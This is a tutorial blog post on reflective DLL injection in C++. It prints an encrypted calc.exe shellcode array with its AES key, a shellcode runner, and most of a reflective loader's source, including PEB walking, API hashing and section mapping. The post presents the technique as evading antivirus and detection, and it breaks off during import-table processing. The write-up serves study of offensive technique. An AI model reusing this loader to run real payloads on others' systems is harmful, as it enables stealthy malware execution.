Reflective DLL Injection in C++

Posted by Brendan Ortiz on October 31, 2021


TL;DR

Implant with our encrypted DLL -> allocates memory for the DLL -> puts the decrypted DLL into that memory space -> finds the offset of the exported ReflectiveLoader function in the DLL -> calls the ReflectiveLoader function -> ReflectiveLoader searches backward for the start of the DLL in memory -> allocates a new memory region that is the size of the DLL image in memory (which is larger than on disk) -> performs loading and patching operations -> calls DllMain of the DLL now that it's been loaded -> DllMain calls our Go function -> Go function decrypts our calc.exe payload and executes it!

Intro

I am currently learning more about malware development. In this endeavor, I’ve learned that C++ appears to be the go-to standard for most malware development scenarios. There are many benefits to writing malware in C++, such as direct use of Windows APIs. In languages such as C#, you need to use something called Platform Invoke, or P/Invoke for short, when you want to use certain Windows APIs, since they’re not native to the language. Learning malware development in C++ took me down the road of reflective DLL injection, which is much more difficult than it sounds.

According to Stephen Fewer, “Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.” 

This means that the library has minimal interaction with the host system. Instead, a self-developed PE (Portable Executable) file loader is responsible for loading the library into the target process’ memory in the correct format for execution. This is not a trivial task and requires pretty extensive knowledge of the PE file format and how the loading process occurs.

Performing this task, however, is extremely beneficial. A library that loads itself is not registered in any way with the host system and, as a result, is largely undetectable at both a system and process level. However, next-generation AV and EDR solutions with visibility into process memory and API hooks will likely still cause issues.

The goal of this blog post is for me to solidify my knowledge in Reflective DLL injection through the process of teaching others. Why Reflective DLL Injection specifically? Great question! This overarching subject includes a multitude of smaller topics that appear to be the cornerstones of more advanced malware development subjects, such as evasive techniques.

Code

The entire code base for the Reflective Loader can be found in my GitHub. You can use this code to follow along as well as the code snippets provided during this blog post.

Reflective DLL Injection Source Review

To kick off this source code review we'll start with DllMain.cpp of the library we want to reflectively load into our process. This code is created by reenz0h.

#include "ReflectiveLoader.h"
#include <windows.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#include <psapi.h>


First, we start with some standard includes. The important thing to note is the "ReflectiveLoader.h" include statement. This is part of the code that will handle loading our DLL in memory.

Next, we have our AESDecrypt function that will handle performing decryption of the DLL once we put it in our implant payload. I won't cover this code section because it is not related to reflective DLL injection in any way. This is simply a means of obfuscating our payload when we put it in our implant so when the implant is saved to disk it can't be read and trigger any anti-virus mechanism.

Then we have our payload and key variables.

// calc shellcode (exitThread) - 64-bit
unsigned char payload[] = { 0x7, 0x26, 0xd8, 0x8e, 0xb8, 0x78, 0xf9, 0x78, 0x84, 0x3c, 0x0, 0xa8, 0x5b, 0xa, 0x6a, 0xe2, 0xc9, 0x6d, 0x63, 0x8b, 0x87, 0x9e, 0x80, 0xb5, 0x16, 0xc5, 0xa5, 0xc7, 0xda, 0x44, 0x1d, 0x2d, 0xae, 0x48, 0x2c, 0xb1, 0xc8, 0x92, 0xf5, 0xbc, 0xf5, 0xb8, 0xe6, 0xda, 0x9, 0x3c, 0x85, 0x9e, 0xac, 0xfa, 0x4c, 0xce, 0xa4, 0x35, 0x0, 0xdc, 0x50, 0x6b, 0x36, 0xb7, 0x5c, 0xfb, 0x12, 0xf1, 0x52, 0x46, 0x5b, 0x15, 0x3, 0x7d, 0x7b, 0x4e, 0x8d, 0x71, 0xf5, 0x7c, 0x43, 0x87, 0x46, 0x54, 0x64, 0xf9, 0x75, 0xab, 0x65, 0xb0, 0xbf, 0x9b, 0xc3, 0xd2, 0x3a, 0x73, 0xfc, 0xe3, 0x35, 0xe1, 0x23, 0x5d, 0x29, 0xe5, 0x10, 0xe2, 0x72, 0xef, 0xa9, 0x25, 0xa, 0x5a, 0x1f, 0x8e, 0xf7, 0xa5, 0xd8, 0x8b, 0x16, 0x33, 0xcf, 0x91, 0xde, 0x17, 0x79, 0x6, 0x5f, 0xd9, 0x61, 0x2c, 0x6a, 0x90, 0x7a, 0xaf, 0xb3, 0xdd, 0x1e, 0x0, 0xe3, 0xf3, 0x70, 0x5, 0x7a, 0x6d, 0x42, 0x7f, 0xb2, 0xc, 0xe0, 0xa2, 0xce, 0x3b, 0x1f, 0xa3, 0xf5, 0xcf, 0xa9, 0x1f, 0x3a, 0xf7, 0xab, 0x3, 0xf3, 0x36, 0xf2, 0x86, 0xf4, 0x4f, 0x20, 0x4a, 0xaa, 0x6a, 0x1c, 0xae, 0xe0, 0x13, 0x29, 0xe3, 0xb7, 0x84, 0xd8, 0x9b, 0xbc, 0x2f, 0xa6, 0xb2, 0x5f, 0xdc, 0x3b, 0x1, 0x70, 0x16, 0x61, 0x4c, 0xee, 0x42, 0x69, 0xf6, 0x1, 0x87, 0x76, 0x2f, 0x84, 0x14, 0x38, 0xd3, 0xa6, 0xe0, 0x25, 0x57, 0xa0, 0x7e, 0x4c, 0x1c, 0x6, 0xf, 0xae, 0x29, 0x92, 0x10, 0x3f, 0x5a, 0xff, 0x1d, 0x57, 0x67, 0x18, 0xba, 0x67, 0xb1, 0x7d, 0x9a, 0x6f, 0x48, 0xa3, 0x23, 0x23, 0x12, 0x62, 0xe3, 0x8b, 0xfb, 0x3e, 0x63, 0x9, 0xd0, 0x1d, 0xf8, 0xb0, 0xf6, 0x9c, 0x94, 0xd4, 0xb3, 0x2b, 0xfe, 0xe, 0xbb, 0x98, 0x65, 0xcf, 0x29, 0x39, 0xf8, 0x74, 0x3b, 0x9d, 0x24, 0xc2, 0xc, 0xa4, 0xdf, 0x7e, 0x4, 0xfd, 0xf9, 0x11, 0xc5, 0x36, 0xc6, 0xb5, 0x27, 0xd, 0x16, 0xa9, 0xe, 0xe3, 0x9, 0x65, 0xfb, 0xa5, 0xa3 };
unsigned char key[] = { 0xaf, 0x86, 0x80, 0xd4, 0x5e, 0xa3, 0xae, 0x79, 0xa9, 0x92, 0x38, 0xbe, 0x79, 0x8a, 0x9c, 0x41 };


These are important. This is the final payload that will be executed by the library we are reflectively loading into our process. All that is important is the fact that the payload is encrypted and will be decrypted by the decryption function using the key provided. The intended functionality is to pop a calc.exe payload.

Next, we have our Go function. This is the function that will be creating the memory space, setting the protections, and creating the execution thread for our calc.exe payload.

void Go(void) {
    void* exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    unsigned int payload_len = sizeof(payload);
    // Allocate memory for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // Decrypt payload
    AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));
    // Copy payload to allocated buffer
    RtlMoveMemory(exec_mem, payload, payload_len);
    // Make the buffer executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    // If all good, launch the payload
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);
    }
}


It starts by initializing some variables, then we take the size of our calc payload, and create a memory region in our current process using VirtualAlloc that is equal to the size of our payload. Next, the payload is decrypted using the key variable and the AESDecrypt function. We follow that up by moving the payload into the memory region we had created using the VirtualAlloc and the pointer to the memory region "exec_mem". Next, we change the protections of our memory region from readable and writable to readable and executable. Finally, we create an execution thread in our process using CreateThread and the pointer to the memory region. All standard process injection techniques.

Finally, our DllMain function calls Go using the CreateThread function once the DLL is loaded and attached to our process.

extern "C" HINSTANCE hAppInstance;
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    BOOL bReturnValue = TRUE;
    switch (dwReason)
    {
    case DLL_QUERY_HMODULE:
        if (lpReserved != NULL)
            *(HMODULE*)lpReserved = hAppInstance;
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Go, 0, 0, 0);
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return bReturnValue;
}


Everything covered up to this point uses standard process injection techniques. However, our reflective loader is going to be a bit more difficult to tackle and explain.

I am not going over the header files because they're pretty standard. The important thing you need to know is that in ReflectiveLoader.h we create the function pointer types that will eventually hold our pointers to LoadLibraryA, GetProcAddress, VirtualAlloc, and NtFlushInstructionCache, which will all be used later in the codebase. The rest of the variables, structures, and definitions in this header file are necessary components to reach and save pointers to the functions mentioned above. This is a simplification; however, the purpose of this blog post is to teach about reflective loading, not PEB data structures and API hashing.

Next up we have the ReflectiveDLLInjection.h file. This file contains some definition logic that will set the function pointer of our loader to the necessary size for our architecture. Then we create two function declarations, the first being our ReflectiveLoader function and the second being our DllMain function.

Finally, we get to the most important piece of our ReflectiveLoader DLL, the ReflectiveLoader.c file. This file contains code from Stephen Fewer that is used to reflectively load a DLL into our process from memory. This process involves parsing the PE headers and laying out the executable in such a way that it is readable and executable in our process. After we are done explaining how our ReflectiveLoader function works, I will explain how it is called from our final implant.

#include "ReflectiveLoader.h"
HINSTANCE hAppInstance = NULL;
#define REFLDR_NAME ReflectiveLoader
#pragma intrinsic( _ReturnAddress )
__declspec(noinline) ULONG_PTR caller(VOID) { return (ULONG_PTR)_ReturnAddress(); }
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME(LPVOID lpParameter)
#else
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME(VOID)
#endif


We start by creating some function definitions and a definition for REFLDR_NAME as "ReflectiveLoader". There's nothing too exciting in this code segment aside from our caller function which returns the address of the instruction just after we call "caller." The way this works is the following:

Address     Instruction     stack before call | stack after call
0x10        call caller()           aaab                0x11
0x11        next instruction                            aaab


When we call the function caller, the CPU pushes the address of the next instruction onto the stack as the return address, which is where execution resumes when we exit the “caller” function. "caller" simply returns that address so it can be stored and used later. Following that, we create a definition for our ReflectiveLoader function based on:

REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR


If this macro is defined, then our definition of the ReflectiveLoader function accepts a parameter; otherwise, it does not.

Next, we dive into the actual ReflectiveLoader function itself:

{
    LOADLIBRARYA pLoadLibraryA = NULL;
    GETPROCADDRESS pGetProcAddress = NULL;
    VIRTUALALLOC pVirtualAlloc = NULL;
    NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
    USHORT usCounter;
    ULONG_PTR uiLibraryAddress;
    ULONG_PTR uiBaseAddress;
    ULONG_PTR uiAddressArray;
    ULONG_PTR uiNameArray;
    ULONG_PTR uiExportDir;
    ULONG_PTR uiNameOrdinals;
    DWORD dwHashValue;
    ULONG_PTR uiHeaderValue;
    ULONG_PTR uiValueA;
    ULONG_PTR uiValueB;
    ULONG_PTR uiValueC;
    ULONG_PTR uiValueD;
    ULONG_PTR uiValueE;
    uiLibraryAddress = caller();


First, we create null pointers to the functions whose types we defined in ReflectiveLoader.h, followed by some variables that are necessary for parsing the PE headers of the library we're attempting to load. Finally, we call our "caller" function, which returns the address of the next instruction; we save it in the uiLibraryAddress variable. (Just know that this is not the actual library address; we're using it as a starting point.) Since ReflectiveLoader is a function exported by our DLL, we know that this address is inside the library we are trying to load. Therefore, we can search backward from our starting address inside ReflectiveLoader until we find the magic bytes that indicate we are at the beginning of a PE file. This is done in the following while loop:

while (TRUE)
    {
        if (((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE)
        {
            uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
            if (uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024)
            {
                uiHeaderValue += uiLibraryAddress;
                if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE)
                    break;
            }
        }
        uiLibraryAddress--;
    }


First, we typecast our current address to a pointer to a DOS header structure. The cast copies nothing; it only lets us read the bytes at that address as IMAGE_DOS_HEADER fields. If we're at the correct address, the e_magic field holds the "MZ" signature, which reads as 0x5A4D when interpreted as a little-endian WORD. If we look at the WINNT.h file that is included in the GitHub directory, we can see that the IMAGE_DOS_SIGNATURE definition equates to 0x5A4D, or "MZ".


If the value at our current address does not equal the magic bytes "MZ", we decrement the address by one and rerun the check. Once uiLibraryAddress points at "MZ", we set uiHeaderValue to the offset of the NT headers, which is stored in the e_lfanew field of the IMAGE_DOS_HEADER structure. If that offset passes a simple sanity check (at least the size of the DOS header and less than 1024), we add the base address of the library, uiLibraryAddress, to it. This gives us the location of the NT headers. Finally, we check whether the Signature field of the IMAGE_NT_HEADERS structure equals IMAGE_NT_SIGNATURE; if it does, we break out of the loop.
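To make the backward search easier to follow, here is a minimal, portable sketch that runs the same three checks against an ordinary byte buffer instead of live process memory. The function name find_image_base and the constant names are my own for illustration and are not part of the loader; the sketch also assumes a little-endian host and adds bounds checks that the real loop does not perform.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Illustrative constants mirroring the values defined in WINNT.h.
constexpr std::uint16_t kDosSignature  = 0x5A4D;      // "MZ" as a little-endian WORD
constexpr std::uint32_t kNtSignature   = 0x00004550;  // "PE\0\0" as a little-endian DWORD
constexpr std::size_t   kLfanewOffset  = 0x3C;        // offset of e_lfanew in the DOS header
constexpr std::size_t   kDosHeaderSize = 64;          // sizeof(IMAGE_DOS_HEADER)

// Walk backward from `start` one byte at a time and return the offset of the
// first position that looks like a PE image base, or -1 if none is found.
long find_image_base(const std::uint8_t* buf, std::size_t len, std::size_t start) {
    assert(buf != nullptr);
    for (std::size_t pos = start + 1; pos-- > 0;) {
        if (pos + kDosHeaderSize > len) continue;      // a DOS header would not fit here
        std::uint16_t magic;
        std::memcpy(&magic, buf + pos, sizeof magic);
        if (magic != kDosSignature) continue;          // check 1: e_magic == "MZ"
        std::uint32_t lfanew;
        std::memcpy(&lfanew, buf + pos + kLfanewOffset, sizeof lfanew);
        if (lfanew < kDosHeaderSize || lfanew >= 1024) continue;  // check 2: plausible e_lfanew
        if (pos + lfanew + sizeof(std::uint32_t) > len) continue;
        std::uint32_t sig;
        std::memcpy(&sig, buf + pos + lfanew, sizeof sig);
        if (sig == kNtSignature) return static_cast<long>(pos);   // check 3: "PE\0\0"
    }
    return -1;
}
```

The second and third checks matter because the two bytes "MZ" can appear by chance anywhere in code or data; requiring a sane e_lfanew that leads to a "PE" signature filters out those false positives.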


When we leave our loop, we have the base address of our DLL and the address of the NT headers structure. The next code chunk uses preprocessor checks to determine whether the loader was compiled for a 64-bit, 32-bit, or ARM system and retrieves a pointer to the PEB accordingly (the ARM line is commented out in this version).

#ifdef WIN_X64
    uiBaseAddress = __readgsqword(0x60);
#else
#ifdef WIN_X86
    uiBaseAddress = __readfsdword(0x30);
#else WIN_ARM
//    uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
#endif
#endif


Our next chunk of code is pretty complex, so please bear with me while I explain it.

    // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
    uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
    // get the first entry of the InMemoryOrder module list
    uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
    while (uiValueA)
    {
        // get pointer to current modules name (unicode string)
        uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
        // set bCounter to the length for the loop
        usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
        // clear uiValueC which will store the hash of the module name
        uiValueC = 0;
        // compute the hash of the module name...


First, we typecast our PEB pointer to the _PPEB type, read its pLdr member (the PEB loader data), and store that value back into uiBaseAddress. The PEB loader data holds information about every module currently loaded into the process. Next, we obtain a pointer to the first entry of the module doubly linked list by typecasting uiBaseAddress to PPEB_LDR_DATA and reading InMemoryOrderModuleList.Flink; the result is stored in uiValueA. We then enter a loop that runs while uiValueA is non-NULL. Because the module list is circular, uiValueA does not normally become NULL, and in practice the loop ends through the break that fires once all four function pointers have been found. Inside the loop, we obtain a pointer to the current module's name by typecasting uiValueA to PLDR_DATA_TABLE_ENTRY and reading BaseDllName.pBuffer into uiValueB. We then set usCounter to BaseDllName.Length, which is the length of the name in bytes. Finally, we zero out uiValueC, which will hold the module's hash value for comparison. The hash values for each module we need are stored in our ReflectiveLoader.h header file.

In case you're wondering what the Process Environment Block's InMemoryOrderModuleList looks like, refer to the image below:


The next code segment will bring us into a do-while loop that will hash the current module's name.

do
        {
            uiValueC = ror((DWORD)uiValueC);
            // normalize to uppercase if the module name is in lowercase
            if (*((BYTE*)uiValueB) >= 'a')
                uiValueC += *((BYTE*)uiValueB) - 0x20;
            else
                uiValueC += *((BYTE*)uiValueB);
            uiValueB++;
        } while (--usCounter);


When we exit our loop, we will have a completed hash of the module's name stored in uiValueC. This value will be checked in two different IF statements that will determine our actions from the next point onward.

        if ((DWORD)uiValueC == KERNEL32DLL_HASH)
        {
                    //FIRST EXECUTION BRANCH
        }
        else if ((DWORD)uiValueC == NTDLLDLL_HASH)
        {
                    //SECOND EXECUTION BRANCH
        }
        // we stop searching when we have found everything we need.
        if (pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache)
            break;
        // get the next entry
        uiValueA = DEREF(uiValueA);


If our uiValueC hash is equal to the KERNEL32DLL_HASH definition stored in ReflectiveLoader.h, we enter the first branch; otherwise, if it's equal to NTDLLDLL_HASH, we enter the second execution branch. After either branch, we always check whether we have pointers to the functions LoadLibraryA, GetProcAddress, VirtualAlloc, and NtFlushInstructionCache. If any of those pointers is still NULL, we move on to the next module by applying the DEREF macro to our current module pointer, which follows its forward link. This process is repeated until we find all four needed functions.
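The rotate-and-add hashing used for module names can be sketched in portable C++ as follows. This is only an illustration: the name hash_module_name is mine, and the rotation count of 13 is an assumption taken from the HASH_KEY value in the upstream ReflectiveLoader.h rather than from anything shown in this post. Like the original loop, it subtracts 0x20 from any byte that is greater than or equal to 'a'.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Assumption: rotate right by 13 bits, as HASH_KEY is defined upstream.
constexpr unsigned kHashKey = 13;

// Rotate a 32-bit value right by kHashKey bits.
constexpr std::uint32_t ror(std::uint32_t v) {
    return (v >> kHashKey) | (v << (32 - kHashKey));
}

// Hash `len` raw bytes of a module name: rotate the running hash, then add
// the current byte, folding bytes >= 'a' to uppercase by subtracting 0x20.
std::uint32_t hash_module_name(const std::uint8_t* name, std::size_t len) {
    assert(name != nullptr && len > 0);
    std::uint32_t h = 0;
    for (std::size_t i = 0; i < len; ++i) {
        h = ror(h);
        h += (name[i] >= 'a') ? name[i] - 0x20u : name[i];
    }
    return h;
}
```

Keep in mind that the real loader feeds this loop the raw bytes of a UTF-16 string (BaseDllName.Length is a byte count), so the zero high bytes of each character are hashed too. Comparing 32-bit hashes instead of strings means the module and function names never have to appear as plain text inside the loader.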

With the execution flow out of the way, let's enter each branch to see how the code obtains the pointers to each function we need.

            // get this modules base address
            uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
            // get the VA of the modules NT Header
            uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
            // uiNameArray = the address of the modules export directory entry
            uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
            // get the VA of the export directory
            uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
            // get the VA for the array of name pointers
            uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
            // get the VA for the array of name ordinals
            uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
            usCounter = 3;
            // loop while we still have imports to find
            while (usCounter > 0)


We only enter this block once the current module is KERNEL32.DLL. We first obtain the base address of KERNEL32.DLL as it is loaded in our process' memory by typecasting our module pointer, uiValueA, to PLDR_DATA_TABLE_ENTRY and reading the DllBase field. We save that value into the uiBaseAddress variable for later use. Next, we obtain a pointer to the NT headers by adding the base address to the offset stored in the e_lfanew field (this part of the code should look familiar, as we did the same thing previously for the DLL we are attempting to load into memory). Following that, we obtain a pointer to the export directory entry by going through the NT headers' optional header, then the optional header's data directory table, and finally the data directory table's export directory entry.


Next, we take the relative virtual address (RVA) of the export directory and add the base address of the module to it to get the actual address of the export directory in our current process' memory for the KERNEL32 module. Using that address, we obtain two more pointers: the first is the address of the names array and the second is the address of the name ordinals array.


Then we set a counter variable, usCounter, to three representing the number of functions we need to find in the Kernel32.dll module. Then we enter a loop that will count down until we've found all our desired function pointers.

            while (usCounter > 0)
            {
                // compute the hash values for this function name
                dwHashValue = hash((char*)(uiBaseAddress + DEREF_32(uiNameArray)));
                // if we have found a function we want we get its virtual address
                if (dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH)
                {
                    // get the VA for the array of addresses
                    uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
                    // use this functions name ordinal as an index into the array of name pointers
                    uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
                    // store this functions VA
                    if (dwHashValue == LOADLIBRARYA_HASH)
                        pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray));
                    else if (dwHashValue == GETPROCADDRESS_HASH)
                        pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray));
                    else if (dwHashValue == VIRTUALALLOC_HASH)
                        pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray));
                    // decrement our counter
                    usCounter--;
                }
                // get the next exported function name
                uiNameArray += sizeof(DWORD);
                // get the next exported function name ordinal
                uiNameOrdinals += sizeof(WORD);
            }


We start by hashing the name of the first function exported by the KERNEL32.dll library, which we reach through our uiNameArray variable. If the hash equals any of the hashes we're looking for, we enter the execution block. In the execution block, we obtain a pointer to the array of addresses, which is named "AddressOfFunctions" in the previous PEBear screenshot. We then advance into the address array by 4 bytes multiplied by the current function's name ordinal, which is read from the name ordinals array. If you're wondering what that looks like, refer to the following screenshot:


As you can see from the screenshot above, we have the array of ordinals in hex bytes in the disassembly, starting from 0 to however many functions we're importing or exporting. We multiply our place by 4 bytes because the array of addresses holds 4 bytes for each function’s relative virtual address. You can see what that looks like in the following screenshot:


Therefore, we obtain the correct function RVA by starting at the base of the export directory's array of addresses and advancing by the name ordinal * 4 bytes. We then check which function hash we matched and save the resulting function address (module base + RVA) into the matching function pointer variable, whose type is defined in ReflectiveLoader.h. We then decrement our counter variable, since there is now one fewer function left to find. Finally, we advance our position in both the name ordinals array and the names array to get the name of the next function. This process is repeated until all functions are found. I won't bother explaining the ‘else if’ block for NTDLL.DLL because it goes through the same process; we just substitute our target library module and function.
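The relationship between the three export tables is easier to see in isolation. The sketch below is a simplified model, not the loader's code: the ExportTables struct and resolve_export function are hypothetical, the names table holds plain C strings instead of RVAs, and names are compared with strcmp instead of by hash.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical, simplified view of an export directory: three parallel tables.
struct ExportTables {
    const char* const*   names;       // AddressOfNames (the real table holds RVAs of strings)
    const std::uint16_t* ordinals;    // AddressOfNameOrdinals: one WORD per name
    const std::uint32_t* functions;   // AddressOfFunctions: one DWORD RVA per export
    std::size_t          name_count;  // NumberOfNames
};

// Return the RVA of the export called `wanted`, or 0 if it is not exported.
std::uint32_t resolve_export(const ExportTables& t, const char* wanted) {
    assert(wanted != nullptr);
    for (std::size_t i = 0; i < t.name_count; ++i) {
        if (std::strcmp(t.names[i], wanted) == 0) {
            // The i-th name pairs with the i-th name ordinal, and that ordinal
            // (not i itself) is the index into the function address table.
            return t.functions[t.ordinals[i]];
        }
    }
    return 0;
}
```

The extra level of indirection exists because the names table is sorted by name while the address table is ordered by ordinal, so position i in one table generally does not correspond to position i in the other.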

Now comes the interesting part: once we've found all the required functions, we can begin to load our malicious DLL into the memory space of our current process. Earlier, we discovered the base address of our malicious DLL by decrementing byte by byte from the address returned by the "caller" function. We now use the base address of the DLL and the e_lfanew value to obtain the address of the NT headers for the DLL.

uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;


We then allocate memory in our current process space using the optional header's SizeOfImage value stored within the NT headers.


uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);


We store a pointer to the allocated memory in a variable named uiBaseAddress. Next, we store the optional header's SizeOfHeaders value, which is the combined size of the DOS header, NT headers, and section headers, into the uiValueA variable. We follow that by storing the base address of the decrypted DLL payload in uiValueB. Finally, we store the base address of our allocated memory in uiValueC.

    // we must now copy over the headers
    uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
    uiValueB = uiLibraryAddress;
    uiValueC = uiBaseAddress;
    while (uiValueA--)
        *(BYTE*)uiValueC++ = *(BYTE*)uiValueB++;


Next, we loop through both the allocated memory and the base address of our library byte by byte and copy the headers into the allocated memory space. We stop once uiValueA (the size of the headers) becomes zero. The header values are the same whether the file is saved on disk or loaded in memory because they act as an index for the executable. We will follow that up by obtaining pointers to each of the section headers and copying the sections over into our allocated memory region one section at a time.

    uiValueA = ((ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader);
    // iterate through all sections, loading them into memory.
    uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
    while (uiValueE--)
    {
        // uiValueB is the VA for this section
        uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress);
        // uiValueC if the VA for this sections data
        uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData);
        // copy the section over
        uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
        while (uiValueD--)
            *(BYTE*)uiValueB++ = *(BYTE*)uiValueC++;
        // get the VA of the next section
        uiValueA += sizeof(IMAGE_SECTION_HEADER);
    }


We start by jumping to the end of the optional header to retrieve a pointer to the first section header and store it in uiValueA. Next, we obtain the number of sections from the file header and store it in uiValueE, which will be the counter for our loop. We obtain the starting address for the section in the allocated memory region by taking the base address of the allocated region, "uiBaseAddress", and adding the virtual address for that section. We then obtain a pointer to the actual data stored in the library by taking the base address of our DLL and adding the raw data offset that is used when the DLL is stored on disk. The section header looks like the following when parsed by PEBear:


On the far left, you have the section name and next to that you have the raw address for the data in that section. When the library is loaded into memory, the virtual address is used, and the data is copied over to the allocated memory region’s base address + the virtual address. When we're done copying the data for our first section, we increment to the next section in our section header and repeat the process until all sections have been successfully copied into the allocated memory region.
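The difference between the raw (on-disk) layout and the virtual (in-memory) layout can be sketched with ordinary vectors. This is a simplified model under my own assumptions: SectionInfo is a hypothetical three-field subset of IMAGE_SECTION_HEADER, map_sections is an illustrative name, and the bounds checks are additions that the original loader leaves out because it trusts its own DLL.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical subset of IMAGE_SECTION_HEADER with only the fields used here.
struct SectionInfo {
    std::uint32_t virtual_address;      // RVA of the section once mapped
    std::uint32_t pointer_to_raw_data;  // offset of the section data in the file
    std::uint32_t size_of_raw_data;     // number of bytes stored in the file
};

// Build the in-memory layout: each section's raw bytes are copied from its
// file offset to (image base + virtual address).
std::vector<std::uint8_t> map_sections(const std::vector<std::uint8_t>& file,
                                       const std::vector<SectionInfo>& sections,
                                       std::size_t size_of_image) {
    std::vector<std::uint8_t> image(size_of_image, 0);
    for (const SectionInfo& s : sections) {
        const std::size_t raw  = s.pointer_to_raw_data;
        const std::size_t rva  = s.virtual_address;
        const std::size_t size = s.size_of_raw_data;
        assert(raw + size <= file.size());   // source range lies inside the file
        assert(rva + size <= image.size());  // destination lies inside the image
        if (size != 0)
            std::memcpy(image.data() + rva, file.data() + raw, size);
    }
    return image;
}
```

Sections that sit back to back in the file end up spread out in the image, with zero-filled gaps between them. That is why the image size taken from SizeOfImage is larger than the file on disk.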

Now that we have our sections in memory, we need to process our DLL's import address table and fix the addresses to reflect their places in memory for our current process. This is where the pointers to GetProcAddress and LoadLibraryA will come into play.

    // STEP 4: process our images import table...
    // uiValueB = the address of the import directory
    uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    // we assume there is an import table to process
    // uiValueC is the first entry in the import table
    uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
    // iterate through all imports
    while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)


The first step is to obtain a pointer to the import directory's entry in the data directory, which is stored in uiValueB. We then obtain a pointer to the first import descriptor by adding the import directory's virtual address to the base address of our allocated memory; this value is stored in uiValueC. We then enter a loop that continues as long as the current import descriptor has a non-zero Name value.

// use LoadLibraryA to load the imported module into memory
        uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
